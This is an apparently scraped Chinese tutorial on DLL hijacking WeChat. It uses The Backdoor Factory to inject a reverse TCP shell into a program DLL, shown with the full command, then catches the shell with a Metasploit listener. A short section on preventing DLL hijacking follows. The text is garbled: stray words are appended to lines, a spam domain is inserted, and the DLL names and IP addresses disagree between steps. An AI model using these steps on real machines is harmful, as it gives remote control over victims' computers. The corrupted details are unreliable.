微信DLL劫持反彈shell復現

 最近恰好在作PPT的dll劫持測試,如今就隨便拿一個程序來練練手。增長一下熟練度。本測試純屬學習測試過程,不可用於非法操做!!!python

 

1、測試環境git

 

 

  工具下載地址:github

    (1)BDF,劫持工具,可用於DLL注入,https://github.com/cream492/the-    backdoor-factoryshell

    (2)ProcessExplorer https://process-explorer.en.softonic.com/任務管理工具,本實驗中用於查找微信程序調用的 DLL 文件微信

 

2、測試過程tcp

 

1
在 Win7 虛擬機中打開微信登陸窗口,須要掃描登陸的窗口便可;然 後開啓 ProcessExplorer,在運行程序列表中找到微信,而後在菜單欄中找「View」—>「LowerPaneView」—>「DLLs」,或者 ctrl+d, 接下來能夠看到微信登陸頁面調用的動態連接庫 以下圖所示工具

測試使用的DLL是libEGL.DLL 文件學習

理論在微信安裝目錄下其餘的DLL文件均可以 有待測試測試

2虛擬機

在kali 中下載 Backdoor - factory www.gendan5.com

執行 ./backdoor.py -h 出現測試安裝是否成功

將 Win7 安裝的微信程序目錄中的 libEGL.dll 拷貝到 kali 系統中,放於 the-backdoor-factory 下,運行命令以下:

python backdoor.py -f Jaky/dbghelp.dll -s reverse_shell_tcp_inline -P 8888 -H 192.168.114.140

其中,-f 表示被劫持的 DLL 文件,-s 表示 shell 的類型,-P 表示 DLL 要鏈接 遠程主機的端口,-H 表示 DLL 鏈接的遠程主機,注意參數的大小寫問題

 

3
而後能夠看到生成的文件放在 backdoored 目錄下

而後將該文件從新放置在win7的微信安裝目錄

4
打開kali中的msf 設置exploit 和payload,隨後設置 lhost 和 lport, IP 是 192.168.112.140,端口是 8888,最後輸入 exploit 或者 run,監聽過來的 shell。

5
在win7中打開微信 不須要登錄 就能在kali中接受到反彈的shell。

反彈shell命令

 

3、預防DLL劫持

 

    (1)DLL劫持利用系統未知DLL的搜索路徑方式,使得程序加載當前目錄下的系統同名DLL。因此能夠告訴系統DLL的位置,改變加載系統DLL的順序不是當前目錄,而是直接到系統目錄下查找。
這個想法能夠經過修改註冊表實現:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSessionManagerKnownDLLs是調用系統DLL的首要查找目錄;例如裏面有RE_SZ類型的"ntdll"="ntdll.dll"項,則系統載入"ntdll"時會直接從系統目錄加載;

由此,添加"LPK"="LPK.DLL"便可防止LPK被劫持,同理能夠阻止一些其餘DLL被劫持,例如"USP10"。    在Windows NT系統,XP默認只有少數關鍵DLL在此鍵值下,Win7下面此鍵值已經至關齊全,在Win7系統下發生DLL劫持的機率要比XP小不少。(借用百度的預防知識點)    (2)還能夠經過第三方工具進行dll劫持檢測。DllHijackAuditor可以防止木馬病毒劫持系統中的dll文件加載運行,是一款很不錯的dll文件保護工具。    (3)堅持從官方下載軟件,拒絕第三方。萬一有後門呢?

相關文章
相關標籤/搜索